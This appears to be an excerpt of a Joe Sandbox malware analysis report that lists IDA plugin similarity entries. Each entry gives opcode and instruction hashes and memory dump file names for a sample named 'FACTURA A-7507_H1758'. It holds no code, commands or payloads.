                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
                                                                                                                                                                                                                          • Instruction ID: e26efd8e0c968b5f26490c19672eda2e13171fc83ace8eba8aef290a27e30941
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 123188B26083459FDB09CF18D84198ABBFAFF89750F0405AAF85497361DB30DC15CBA2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 913e4e62fe5ed1eb351d392b489c690631754249b42677e026e479e93032757f
                                                                                                                                                                                                                          • Instruction ID: 21302971e00a34f5e3047080226a6c191af818be26640438992a452064e14bee
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 913e4e62fe5ed1eb351d392b489c690631754249b42677e026e479e93032757f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B214036701750A6CB1D9BD98800FBBBB74EF40791F80C41EFE658A550E731D945CBA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 0febc925cb0e4ccbc8e4a917ea3f16ba4930d258330f25c75b38f151338081d9
                                                                                                                                                                                                                          • Instruction ID: ff66744a6acd7ad73ef7606bfc715230afdf86bb1336385204797400d27ebcc6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0febc925cb0e4ccbc8e4a917ea3f16ba4930d258330f25c75b38f151338081d9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C21F3B22483009BD618DF24D804F4B77F8EB44A18F41086EF501A7780EF30E906CBE2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c0a74c985dc5fca38d18030c5703ffa6b4525eabf056e94a4e8ea80e28463cd5
                                                                                                                                                                                                                          • Instruction ID: 76b9a5b13f59763630dd04e26901aa1f5f70df8f1d18cdfec94fe0c1f5cc3985
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0a74c985dc5fca38d18030c5703ffa6b4525eabf056e94a4e8ea80e28463cd5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6431CDB6A017549FEB08CF55C480B8EB7B1FF88B24F15455AE812AB390E775E901CF90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3a330ed7ea655d71dd4bed34469b5c9d3971825b19a448a40de0f01e8c52a13d
                                                                                                                                                                                                                          • Instruction ID: e93a341c11739cae7f1bd38766af48bb1719ca98f59157edab05425443a03618
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a330ed7ea655d71dd4bed34469b5c9d3971825b19a448a40de0f01e8c52a13d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B721ACB5201704AFD71DCF55C440B56BBAAFF85361F51856DE00A8B2A0EBB1E801CA95
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 828829a799c2976c2085d40aace8fd1d34904b7204ea94351c8111e49abba551
                                                                                                                                                                                                                          • Instruction ID: 03b80e5d99344a654777e0c962b76e987c361e8fd96e04ce01c874e613640568
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 828829a799c2976c2085d40aace8fd1d34904b7204ea94351c8111e49abba551
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E821D172206B41DBEB3D9B24D844F46B7F2BF10664F10469EE45646AE0DFA1F8428B91
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4a317909ff548ca3dd767030f5ab5730d4ee15b3469b6bb6ebb07f4c482b2c18
                                                                                                                                                                                                                          • Instruction ID: ebe6b35e43b6717239c0650f556057e0e3f406d5599199257172694ea52eb83e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a317909ff548ca3dd767030f5ab5730d4ee15b3469b6bb6ebb07f4c482b2c18
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1521CC7AA01215AFEB158F59C884F5EBBB8FF457A8F018468E8149B220D730ED00CF91
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 575a3526d1c358682353366e68caeade6c1654175c3d3c744dba7750c30e3068
                                                                                                                                                                                                                          • Instruction ID: b2b01c598e83a8050b766d5e66b7ac960b0ecb191bdec90ef78146eb21762c87
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 575a3526d1c358682353366e68caeade6c1654175c3d3c744dba7750c30e3068
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A219D76600605AFDB26DE59CC80F9B77F9EF947A1F02446DE91A8B220E730E905EB50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 44db8b9cdce5322c2a6f765cb161587051123ce54d906edf4d20686586621012
                                                                                                                                                                                                                          • Instruction ID: 39ed68f291b7419a04dd835fb16965227383c339a49fc6f8c63a6a21a4cd7e4d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44db8b9cdce5322c2a6f765cb161587051123ce54d906edf4d20686586621012
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B2100B7608381ABD309CF65C844B5BB7ECAFA2644F4004ABBC40CB255E730C909C6A2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6e00257dc14b4a21706c11d80b94c86bd4fe7158da46d6ffa4b94db1d511f37e
                                                                                                                                                                                                                          • Instruction ID: 04bbe1a089dc39c2fdcd116b8996c4c0e7e71290b510e2263b26a4db36e228b1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e00257dc14b4a21706c11d80b94c86bd4fe7158da46d6ffa4b94db1d511f37e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD21CDB26456849BE30ECB9AC941F85BBE9BF45B90F1904E0EC418B792EB79DC81C750
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
Memory Dump Source
• Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
• Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ee17a0d1079a4772c603ff45f84419bb43025fe42eb990e5d19e7a9d1d14c39e
                                                                                                                                                                                                                          • Instruction ID: 89a25c820f5872ec229f6b00f0941a2c498781410cc22548f36a5c4918d9bc8c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee17a0d1079a4772c603ff45f84419bb43025fe42eb990e5d19e7a9d1d14c39e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF216AB6A00209FFEB158F94CD80F9EBBBAFF88350F204499F911A7250D774D9519B50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5213d1c6f7995497c6cc9203e5f9c37ca42656cc1e88514f8c7b3d018fb16717
                                                                                                                                                                                                                          • Instruction ID: 8f9463259d509f0f86fbcf896d26e19135700653c8d867af06bbce4cb3c5c60d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5213d1c6f7995497c6cc9203e5f9c37ca42656cc1e88514f8c7b3d018fb16717
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF2104B1A062088FE719CF69D0457EEB7B4FF8C318F198068D812673E0DBB8A865C750
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 1cd89947a9881d48d6a7377b2bfe0d6f8c50f81daef442ce147b9f50bd032768
                                                                                                                                                                                                                          • Instruction ID: b684d51824bb8b05d8ebb012eb205ae931e27ab477840456ecd851c32475d063
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1cd89947a9881d48d6a7377b2bfe0d6f8c50f81daef442ce147b9f50bd032768
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F211D07A250640AFE729CB24CC40F8AB3B9FF80760F12449DE4159B690EB74FA41CAA4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ded00fc741f156a9737ae4e2ca471b49417c897f16dadb42785818659e97f824
                                                                                                                                                                                                                          • Instruction ID: b9032ad2ef5f46777ad6db99e0140d47f2d501c281991f76e6736a8c5af6a0a4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ded00fc741f156a9737ae4e2ca471b49417c897f16dadb42785818659e97f824
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B811E27A222640AFD3188F50EA40A6277F8EBA9F80F11402AF410A7350EF35FD03C764
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9c11f5a85aceb97351c23905b198bfefc4e2f3e4454601958d88697f3906e84c
                                                                                                                                                                                                                          • Instruction ID: eeadd58444fac85f329ccdca99ea22c84a0206a5992ae0208e6ba4ebbce5709b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c11f5a85aceb97351c23905b198bfefc4e2f3e4454601958d88697f3906e84c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4110679241B929BE31CC728C090B61B3F4FF1174CF14449AF885CB755D7A9D886CA20
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5c37b503e218ef63c6b8745a42fe926baf7c544a8a7ec07d477c40a20732d257
                                                                                                                                                                                                                          • Instruction ID: 2af72d5c30c939056e6944f8e2e5d08a44bc036e4e3a58ec991f7a7ff411327d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c37b503e218ef63c6b8745a42fe926baf7c544a8a7ec07d477c40a20732d257
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27118BB9604684AFEB0DCFA4C840B9AB7B9BB89650F1544A9D85697301E670E942CB50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 687d88dc58005f4c19027386dfd2b8a65a529e7e69b98a6afcdceafa66fbbb08
                                                                                                                                                                                                                          • Instruction ID: d2675e6ba266bf0e6508301993b866d800c49d63c286532f71e307d9fe0861ef
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 687d88dc58005f4c19027386dfd2b8a65a529e7e69b98a6afcdceafa66fbbb08
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D212A75E04209DFDB08CF98C5A1BECF3B1FB48365F50829AD525A7282DB766842CF90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 344a7ebce17cc95804a4fe4266c3854e038087be8121a2260c2918af3b52c5a9
                                                                                                                                                                                                                          • Instruction ID: ca01733c98d09e680199b975cfbdf844a288854a3b1fd6041f9cad2ab97a6f4c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 344a7ebce17cc95804a4fe4266c3854e038087be8121a2260c2918af3b52c5a9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9711E572600248BFD7098F6CD8809BEB7B9EF95744F10806DF8448B351DA31CD55C7A4
Memory Dump Source
• Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
• Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4384220c295f4d3e533a6fcae8810504b2e89fc3e26a35c5d159139cdbb2224c
                                                                                                                                                                                                                          • Instruction ID: 83d986c1f158dce13ba8a1618d601b1b5c9100bdec83219ff404106daebbe4c6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4384220c295f4d3e533a6fcae8810504b2e89fc3e26a35c5d159139cdbb2224c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97016D72B04209AB9B0ECBA6D955DAF7BBCEF84655B02005EAD01D3200EB70EE45D770
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 646e25a638fa3b4a700df3d08f5a6902b23bc95fc164badaacba4931a92be448
                                                                                                                                                                                                                          • Instruction ID: bd630b8e5acde11393c9cccb663ab8213176a2d7844cdcb2e6e545e05b08d76b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 646e25a638fa3b4a700df3d08f5a6902b23bc95fc164badaacba4931a92be448
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72019BB5655A709FD32F8B14EA50E277BF6EFC5A50B1580EEE4498B311DB30D842C784
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7cddb40079202bfd92c3edd3119cfff25af40e8bc7736758823e24a628999efa
                                                                                                                                                                                                                          • Instruction ID: 2caeb631bb0136d4b25ef675e0669e00a65cceb80f7dccf97196ef63ff8430bb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7cddb40079202bfd92c3edd3119cfff25af40e8bc7736758823e24a628999efa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51114CB9614286DFD748CF19D440B85BBF4FB49315F44C29AE848CB301E735E881CBA1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c41e28e914b5a645e6de5d64ec799043ad428fbbbeadc911ddc0df3e24c4a569
                                                                                                                                                                                                                          • Instruction ID: b3150f4651cb7cb063130e9f550d11303bd4415802aa6a885dc5652667d527bc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c41e28e914b5a645e6de5d64ec799043ad428fbbbeadc911ddc0df3e24c4a569
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B1188B2600724AFE715CF68C941B9B77F8FB45384F0184A9E9868B310DB75E801CBA4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
